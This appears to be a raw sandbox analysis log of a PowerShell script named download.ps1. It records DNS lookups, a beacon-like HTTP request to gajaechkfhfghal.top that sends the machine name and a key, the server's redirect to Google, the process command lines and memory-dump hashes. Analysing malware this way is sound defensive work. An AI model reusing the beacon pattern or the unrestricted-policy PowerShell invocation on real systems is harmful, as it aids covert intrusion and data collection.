Dec 23, 2024 13:17:05.124254942 CET | 192.168.2.4 | 1.1.1.1 | 0xe34e | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 13:17:03.678242922 CET | 1.1.1.1 | 192.168.2.4 | 0xc67c | No error (0) | gajaechkfhfghal.top | | 45.61.136.138 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 13:17:05.262866020 CET | 1.1.1.1 | 192.168.2.4 | 0xe34e | No error (0) | www.google.com | | 172.217.21.36 | A (IP address) | IN (0x0001) | false

• gajaechkfhfghal.top
• www.google.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 45.61.136.138 | 80 | 6624 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 13:17:03.816092014 CET | 215 | OUT | GET /aoe6m40s3hhtr.php?id=user-PC&key=85684789732&s=527 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: gajaechkfhfghal.top
Connection: Keep-Alive
Dec 23, 2024 13:17:05.122961998 CET | 166 | IN | HTTP/1.1 302 Found
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 23 Dec 2024 12:17:04 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.google.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 172.217.21.36 | 80 | 6624 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 13:17:05.386326075 CET | 159 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: www.google.com
Connection: Keep-Alive
Dec 23, 2024 13:17:07.207122087 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 12:17:06 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-epDluNOoLrVXEHvCsvkULQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-VU8yHmhx7sfC8R81De53MMGkAgYfjYwfATGhr1YOKeMraL7mhdF1o; expires=Sat, 21-Jun-2025 12:17:06 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=520=rgF4TgcgjpnaeTbOu-xR9lpOK_FPjzaqcpp5NahMf2GifaTdkATNou0Ogz3dvrAFi3NmIOlKCGo0NS1FVfIpJ4yEX5nBZB5seGdtklZl0KJPAypDaswdlAYRZ-J9meF4wilJaUHjZ1NEsVl_ngmCDwgq2hNF8UfPC9_dcXMPNXfyuYKrP0ZHjoLbuG1fGZL9HtUCBuSu; expires=Tue, 24-Jun-2025 12:17:06 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
                                                                                                                  Dec 23, 2024 13:17:07.207230091 CET1236INData Raw: 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69
                                                                                                                  Data Ascii: rap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute;top:-999px;visibility:hidden;z-index:998;right:0}.gbto #gbs{background:#fff}#gbx3,#gbx4{background-col
                                                                                                                  Dec 23, 2024 13:17:07.207370043 CET1236INData Raw: 31 3b 74 6f 70 3a 2d 31 70 78 3b 6c 65 66 74 3a 2d 32 70 78 3b 72 69 67 68 74 3a 2d 32 70 78 3b 62 6f 74 74 6f 6d 3a 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74
                                                                                                                  Data Ascii: 1;top:-1px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blu
                                                                                                                  Dec 23, 2024 13:17:07.207391024 CET1236INData Raw: 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 2e 67 62 74 73 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 67 62 7a 74 20 2e 67 62 74 73 7b 64 69
                                                                                                                  Data Ascii: ;padding:0 5px;position:relative;z-index:1000}.gbts{*display:inline}.gbzt .gbts{display:inline;zoom:1}.gbto .gbts{background:#fff;border-color:#bebebe;color:#36c;padding-bottom:1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbts
                                                                                                                  Dec 23, 2024 13:17:07.207408905 CET1236INData Raw: 69 2c 23 67 62 69 34 69 64 7b 6c 65 66 74 3a 35 70 78 3b 62 6f 72 64 65 72 3a 30 3b 68 65 69 67 68 74 3a 32 34 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 70 78 3b 77 69 64 74 68 3a 32 34 70 78 7d 2e 67 62 74 6f
                                                                                                                  Data Ascii: i,#gbi4id{left:5px;border:0;height:24px;position:absolute;top:1px;width:24px}.gbto #gbi4i,.gbto #gbi4id{top:3px}.gbi4p{display:block;width:24px}#gbi4id{background-position:-44px -101px}#gbmpid{background-position:0 0}#gbmpi,#gbmpid{border:none
                                                                                                                  Dec 23, 2024 13:17:07.327945948 CET1236INData Raw: 7d 2e 67 62 6d 6c 31 2d 68 76 72 2c 2e 67 62 6d 6c 31 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 70 6d 20 2e
                                                                                                                  Data Ascii: }.gbml1-hvr,.gbml1:focus{outline:none;text-decoration:underline !important}#gbpm .gbml1{display:inline;margin:0;padding:0;white-space:nowrap}.gbmlb,.gbmlb:visited{line-height:27px}.gbmlb-hvr,.gbmlb:focus{outline:none;text-decoration:underline



Target ID: 0
Start time: 07:16:57
Start date: 23/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 07:16:57
Start date: 23/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1833640585.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bad0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7b14123b53008c1b6552f478281627d5293a0477c7165b35eac49c202ed3ada7
                                                                                                                    • Instruction ID: 4e538f62359cccf24d27ffee03842423bdfa2fb6e59222fff19ab7f4497fdfb5
                                                                                                                    • Opcode Fuzzy Hash: 7b14123b53008c1b6552f478281627d5293a0477c7165b35eac49c202ed3ada7
                                                                                                                    • Instruction Fuzzy Hash: EA218471A08A0C8FDB58DF9CD84A7E97BE0EBA9321F10822FD449D3255D670A856CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1833640585.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bad0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: faa72056b23f4666ed7f05aa86772a0f70fd84c7ca456828b6b57aaed1443a77
                                                                                                                    • Instruction ID: bcef5379100ea3313cdf084a82322ceb02023ec338dbb171ba13715ecfdc43c9
                                                                                                                    • Opcode Fuzzy Hash: faa72056b23f4666ed7f05aa86772a0f70fd84c7ca456828b6b57aaed1443a77
                                                                                                                    • Instruction Fuzzy Hash: 1B01A73020CB0C4FD748EF0CE051AA5B3E0FF85320F10066DE58AC36A1DA32E882CB45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1837077114.00007FFD9BD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bd80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6c7248435ba749c02c71e6d0d266bf35cceabce8e0ad98d7f64a993b3c7cfb3e
                                                                                                                    • Instruction ID: 306f3ea558141f0ae2e98a0a12ca52115d9c62a8aa22ff259e347ab7073b2c91
                                                                                                                    • Opcode Fuzzy Hash: 6c7248435ba749c02c71e6d0d266bf35cceabce8e0ad98d7f64a993b3c7cfb3e
                                                                                                                    • Instruction Fuzzy Hash: CBF09A32B0E9098FD769EA4CE4919B873E0FF09320B1900B6E25DC75A7CA36AC05CB40
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1837077114.00007FFD9BD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bd80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0878650b2a9cd62e9eb6cd45ee6be6c2dfd5effe174ce545c98cc56152efd1b6
                                                                                                                    • Instruction ID: a42c90e7c6420953d05a4fe6d64c50dc943ab9b35c023996dd1015e283dc0277
                                                                                                                    • Opcode Fuzzy Hash: 0878650b2a9cd62e9eb6cd45ee6be6c2dfd5effe174ce545c98cc56152efd1b6
                                                                                                                    • Instruction Fuzzy Hash: 9DF05431A0D5494FD799EA9CD4518A477E0EF0532571510B6E25DC75B7CA35AC40C740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1833640585.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bad0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: afeb082aeffdfdbbf52cc026658f49245bbff744f1b2381403a376fa27dfa923
                                                                                                                    • Instruction ID: 6337700a6c7a8571ffe8fcfc3847803bc6671640733350ef0cf565f1a9658cb7
                                                                                                                    • Opcode Fuzzy Hash: afeb082aeffdfdbbf52cc026658f49245bbff744f1b2381403a376fa27dfa923
                                                                                                                    • Instruction Fuzzy Hash: 2FF0E93080868D8FDB1AEF6488195E5BFA0FF26310B0502EBE459C71B1DB749554CBC2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1837077114.00007FFD9BD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bd80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 0PI$D5
                                                                                                                    • API String ID: 0-4014747524
                                                                                                                    • Opcode ID: 42407ba46af9c777a67ebb18b423ebe3e0e107b052d017846e756a0114e54f0e
                                                                                                                    • Instruction ID: 1223d0557a323b3fb4d01e762e1088457efec06772ae2b3deb9b4b799781d745
                                                                                                                    • Opcode Fuzzy Hash: 42407ba46af9c777a67ebb18b423ebe3e0e107b052d017846e756a0114e54f0e
                                                                                                                    • Instruction Fuzzy Hash: 8E51FB21A0FFC94FD75EC67888649653F91EF5631075A01FED08ACB0E3D92AAD46C391
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1834207572.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bba0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0e291051d3637355e200a8052f698468c0cd5e6beb9f5c1033da23768a432df5
                                                                                                                    • Instruction ID: 452ac2d2c442f820048e50349e5f690f0937a4ead9103e3f114ac458a30ebda5
                                                                                                                    • Opcode Fuzzy Hash: 0e291051d3637355e200a8052f698468c0cd5e6beb9f5c1033da23768a432df5
                                                                                                                    • Instruction Fuzzy Hash: 99924472E0EA8E4FE7A5DA6888756647BE1FFA5308B1901BED05DC71E3DD29AC41C340